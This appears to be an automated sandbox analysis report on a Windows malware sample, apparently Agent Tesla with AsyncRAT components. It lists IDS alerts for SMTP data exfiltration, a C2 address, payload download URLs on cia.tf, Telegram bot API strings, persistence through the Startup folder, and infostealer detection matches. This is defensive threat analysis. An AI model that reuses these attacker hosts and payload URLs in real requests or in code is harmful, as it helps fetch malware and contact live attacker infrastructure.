Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb@RqN source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Liphmahu.PDB source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP*n,C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbM source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 0715402Ch	0_2_07153E12
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 0715402Ch	0_2_07153E20
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 071536EFh	0_2_07153690
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 071536EFh	0_2_07153682
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 0715A448h	0_2_0715A6EF
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 0715A448h	0_2_0715A505
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 0715A448h	0_2_0715A3B8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 4x nop then jmp 0715A448h	0_2_0715A3C8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4x nop then jmp 05D8A7B5h	4_2_05D8A490
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4x nop then jmp 05D8A7B5h	4_2_05D8A480
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4x nop then jmp 05D8A7B5h	4_2_05D8A84C
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4x nop then jmp 05D84475h	4_2_05D84280
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4x nop then jmp 05D84475h	4_2_05D84270
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 4x nop then jmp 0748402Ch	7_2_07483E12
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 4x nop then jmp 0748402Ch	7_2_07483E20
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 4x nop then jmp 074836EFh	7_2_07483682
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 4x nop then jmp 074836EFh	7_2_07483690
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 4x nop then jmp 0748A448h	7_2_0748A505
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 4x nop then jmp 0748A448h	7_2_0748A3C8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 4x nop then jmp 0748A448h	7_2_0748A3B8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49743 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49743 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49757 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49757 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49743 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49743 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49757 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49757 -> 162.254.34.31:587

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 89.40.31.232

Yara detected Generic Downloader

Source: Yara match	File source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49743 -> 162.254.34.31:587

Source: global traffic	HTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /417440cce6502c1c57308172e9826dec.mp4 HTTP/1.1Host: cia.tfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 162.254.34.31 162.254.34.31

Source: Joe Sandbox View

ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49743 -> 162.254.34.31:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /417440cce6502c1c57308172e9826dec.mp4 HTTP/1.1Host: cia.tfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fef4b8b5d2edef77f163d9b5ed69e2ea.vdf HTTP/1.1Host: cia.tfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: cia.tf
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001163000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3136475457.00000000068E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3135918315.000000000555B000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3136475457.00000000068E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001163000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.000000000117E000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3136475457.00000000068E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001163000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Liphmahu.exe, 00000004.00000002.2209273870.00000000060D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf
Source: Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/417440cce6502c1c57308172e9826dec.mp4HI
Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI
Source: ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI=
Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004440000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0715F008 NtResumeThread,	0_2_0715F008
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0715F002 NtResumeThread,	0_2_0715F002
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8F138 NtResumeThread,	4_2_05D8F138
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8F130 NtResumeThread,	4_2_05D8F130
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A2E870 NtProtectVirtualMemory,	4_2_06A2E870
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A2E868 NtProtectVirtualMemory,	4_2_06A2E868
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2CC88 NtProtectVirtualMemory,	7_2_06E2CC88
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2F140 NtResumeThread,	7_2_06E2F140
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2CC81 NtProtectVirtualMemory,	7_2_06E2CC81
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2F138 NtResumeThread,	7_2_06E2F138

Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0133CB14	0_2_0133CB14
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0133F3B8	0_2_0133F3B8
